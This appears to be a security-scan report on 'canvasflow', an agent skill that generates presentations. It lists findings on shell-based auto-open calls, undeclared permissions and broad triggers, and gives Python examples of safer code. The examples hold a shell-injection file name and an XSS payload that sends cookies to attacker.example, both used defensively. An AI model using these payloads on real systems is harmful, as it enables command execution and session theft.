canvasflow-专业杂志级PPT一键生成专家 (canvasflow: professional magazine-grade one-click PPT generator)

Security checks across malware telemetry and agentic risk

Overview

This presentation generator largely does what it claims, but its helper scripts automatically run a macOS shell command (`open`) on the generated file path via os.system(), which creates a local command-execution risk: the path is interpolated into a shell string, so a file name containing quotes or shell metacharacters changes the command that /bin/sh runs.

Review before installing if you plan to run the bundled scripts, especially on macOS. Prefer removing the auto-open lines, or put them behind an explicit --open option and launch the file with a non-shell subprocess call (an argv list, no shell=True) so the path is passed as a single argument. Only open files from an output directory you control, and reject paths that resolve outside it. For sensitive presentations, pin third-party CDN assets with Subresource Integrity or vendor them locally before sharing or opening the generated HTML, so a modified CDN script cannot run in the deck.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Behavioral AST: exec() Call, eval() Call, Dynamic Import
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
Findings (13)

os.system() or os exec-family call

High
Category
Dangerous Code Execution
Content
# Auto-open (macOS)
    if sys.platform == "darwin":
        os.system(f'open "{output_file}"')


if __name__ == "__main__":
Confidence
91% confidence
Finding
os.system(f'open "{output_file}"')

os.system() or os exec-family call

High
Category
Dangerous Code Execution
Content
# Auto-open (macOS)
    if sys.platform == "darwin":
        if results["html"]:
            os.system(f'open "{results["html"]}"')
        elif results["pptx"]:
            os.system(f'open "{results["pptx"]}"')
Confidence
90% confidence
Finding
os.system(f'open "{results["html"]}"')

os.system() or os exec-family call

High
Category
Dangerous Code Execution
Content
if results["html"]:
            os.system(f'open "{results["html"]}"')
        elif results["pptx"]:
            os.system(f'open "{results["pptx"]}"')


if __name__ == "__main__":
Confidence
90% confidence
Finding
os.system(f'open "{results["pptx"]}"')

os.system() or os exec-family call

High
Category
Dangerous Code Execution
Content
# Auto-open (macOS)
    if sys.platform == "darwin":
        os.system(f'open "{output_file}"')


if __name__ == "__main__":
Confidence
96% confidence
Finding
os.system(f'open "{output_file}"')
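The four os.system() findings above and the Overview's recommendation describe the same fix: an explicit --open option, a non-shell launch, and a trusted output path. The block below is an added example of that pattern and is not code from the canvasflow scripts; build_shell_command() only reproduces the string the original line hands to the shell so the injection is visible without running it, and OUTPUT_DIR, resolve_output_path, open_argv and safe_open are illustrative names.

```python
"""Added example (not the skill's own code): replacing
os.system(f'open "{output_file}"') with an opt-in, non-shell launch
whose target is confined to a trusted output directory."""
import argparse
import shlex
import subprocess
import sys
from pathlib import Path

# Illustrative trusted output directory; the real scripts' layout is not on the page.
OUTPUT_DIR = Path("/tmp/canvasflow-out")


def build_shell_command(output_file: str) -> str:
    """The exact string the scanned line passes to /bin/sh. Returned, never executed:
    a file name like  x.html"; touch /tmp/pwned; echo "  becomes three commands."""
    return f'open "{output_file}"'


def resolve_output_path(output_file: str, output_dir: Path = OUTPUT_DIR) -> Path:
    """Resolve the target and refuse anything outside output_dir ('..', absolute paths,
    symlinks pointing elsewhere all fail the containment check)."""
    out_dir = output_dir.resolve()
    path = (out_dir / output_file).resolve()
    if path != out_dir and out_dir not in path.parents:
        raise ValueError(f"refusing to open path outside {out_dir}: {path}")
    return path


def open_argv(path: Path, platform: str = sys.platform) -> list:
    """argv for a non-shell launch: the path is one argument and is never re-parsed."""
    if platform == "darwin":
        return ["open", str(path)]
    if platform.startswith("linux"):
        return ["xdg-open", str(path)]
    raise RuntimeError(f"no opener configured for {platform}")


def safe_open(output_file: str, run=subprocess.run, platform: str = sys.platform) -> list:
    """Validate, then launch without a shell. `run` is injectable so the launch can be
    stubbed; with the real subprocess.run, shell metacharacters in the name are inert."""
    argv = open_argv(resolve_output_path(output_file), platform)
    run(argv, check=True)  # no shell=True, no string interpolation
    return argv


def main(argv=None) -> int:
    parser = argparse.ArgumentParser(description="generate a deck and optionally open it")
    parser.add_argument("output_file", help="file name inside the trusted output directory")
    parser.add_argument("--open", action="store_true",
                        help="launch the generated file after writing it (off by default)")
    args = parser.parse_args(argv)
    # Generation would run here; the page only shows the auto-open tail of the scripts.
    if args.open:
        print("launching:", shlex.join(safe_open(args.output_file)))
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

The default is to not open anything; the user has to pass --open, and even then the launcher receives an argv list whose second element is the whole file name, so a crafted name can at worst fail to open.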

Lp3

Medium
Category
MCP Least Privilege
Confidence
85% confidence
Finding
The skill instructs the agent to read local files, write generated content to disk, and execute a shell command (`open ...`) without declaring those capabilities as permissions. Undeclared powerful operations reduce transparency and can lead to unexpected file-system access or command execution in environments that rely on permission manifests for containment.

Tp4

High
Category
MCP Tool Poisoning
Confidence
82% confidence
Finding
The documentation overstates or misstates behavior, including hidden side effects such as writing files and invoking a shell command, while claiming capabilities that are not actually implemented. This mismatch can cause users or hosting platforms to grant trust under false assumptions, making risky operations more likely to occur without informed consent.

Context-Inappropriate Capability

Medium
Confidence
84% confidence
Finding
Automatically launching the generated HTML is outside the core requirement of generating a presentation file and introduces an unnecessary execution capability. In a skill that writes user-influenced HTML, auto-opening the output can immediately trigger active content in the browser, making any embedded script or malicious markup more dangerous.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
The script automatically opens generated files on macOS without user confirmation, which exceeds the core generation function and can launch local applications unexpectedly. In a skill context, this is more dangerous because users expect content generation, not autonomous execution side effects that may open active content or external handlers.

Context-Inappropriate Capability

Low
Confidence
87% confidence
Finding
The script automatically opens the generated file using a platform command even though file generation does not require code execution or launching external applications. This expands the script's side effects and can unexpectedly invoke local handlers, increasing user risk and making abuse of the unsafe shell invocation more consequential.

Vague Triggers

Medium
Confidence
92% confidence
Finding
The trigger phrases include very generic requests such as “做 PPT” (“make a PPT”) and “生成演示” (“generate a presentation”), which are common in normal user conversations and can cause the skill to activate when the user did not explicitly intend to use this specific skill. In an agent environment, overly broad activation increases the chance of incorrect routing, unintended file generation, or the skill taking over unrelated presentation tasks without clear user consent.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The skill executes a shell command to open the generated HTML automatically, without confirmation. This removes user control and can cause unintended execution of browser-side scripts or external resource loads as soon as the file is created, which is riskier in this context because multiple slide fields are inserted into HTML without escaping.
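This finding and the Context-Inappropriate Capability findings above tie the auto-open risk to slide fields that are inserted into the HTML without escaping, and the Overview recommends pinning CDN assets. The block below is an added example of both mitigations and is not code from the skill: the slide layout, the function names (render_slide_unsafe, render_slide, sri_integrity, script_tag, render_deck) and the asset bytes are illustrative. The unsafe renderer mirrors the unescaped insertion the scan describes; the safe one escapes every user-influenced field and emits a script tag the browser will refuse to execute if the served bytes differ from the reviewed copy.

```python
"""Added example (not the skill's own code): escaping user-influenced slide
fields before HTML insertion, and pinning a third-party script with
Subresource Integrity (SRI) so a swapped CDN file does not run."""
import base64
import hashlib
import html


def render_slide_unsafe(title: str, body: str) -> str:
    """Unescaped f-string insertion, as the scan describes: markup in a field is live."""
    return f"<section><h1>{title}</h1><p>{body}</p></section>"


def render_slide(title: str, body: str) -> str:
    """Same layout with each field escaped; quote=True also makes it safe in attributes."""
    return (
        f"<section><h1>{html.escape(title, quote=True)}</h1>"
        f"<p>{html.escape(body, quote=True)}</p></section>"
    )


def sri_integrity(asset_bytes: bytes) -> str:
    """SRI value (sha384, base64) computed from the exact bytes that were reviewed."""
    digest = hashlib.sha384(asset_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def script_tag(src: str, asset_bytes: bytes) -> str:
    """A script tag the browser rejects if the fetched bytes do not match the pin."""
    return (
        f'<script src="{html.escape(src, quote=True)}" '
        f'integrity="{sri_integrity(asset_bytes)}" crossorigin="anonymous"></script>'
    )


def render_deck(slides, assets) -> str:
    """slides: iterable of (title, body); assets: iterable of (url, reviewed_bytes)."""
    head = "".join(script_tag(src, data) for src, data in assets)
    body = "".join(render_slide(t, b) for t, b in slides)
    return f"<!doctype html><html><head>{head}</head><body>{body}</body></html>"


if __name__ == "__main__":
    # Constructed input: a slide body carrying an event-handler payload, and a
    # stand-in byte string for a library whose copy you have reviewed.
    slides = [("Q3 results",
               '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">')]
    assets = [("https://cdn.example/reveal.min.js", b"/* reviewed copy of the library */")]
    print(render_deck(slides, assets))
```

Escaping happens at the point of insertion, not on input, so every field reaching the template is covered regardless of where it came from. For the SRI pin, compute the hash from the copy you actually audited, not from whatever the CDN serves at build time.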

Missing User Warnings

Medium
Confidence
94% confidence
Finding
Automatic shell-based execution without prior warning violates the principle of least surprise and creates an avoidable execution pathway. Even if intended for convenience, using shell execution to launch generated artifacts can be abused or can expose users to unintended application behavior, especially when file content may be partially derived from user-controlled input.

Missing User Warnings

Medium
Confidence
83% confidence
Finding
Automatically executing a shell command without prior confirmation is unsafe because it performs an external action the user did not explicitly approve. In this skill's context, the risk is amplified by the fact that the opened target path is user-influenced and the action is unrelated to the core requirement of generating a presentation file.

VirusTotal

66/66 vendors flagged this skill as clean.
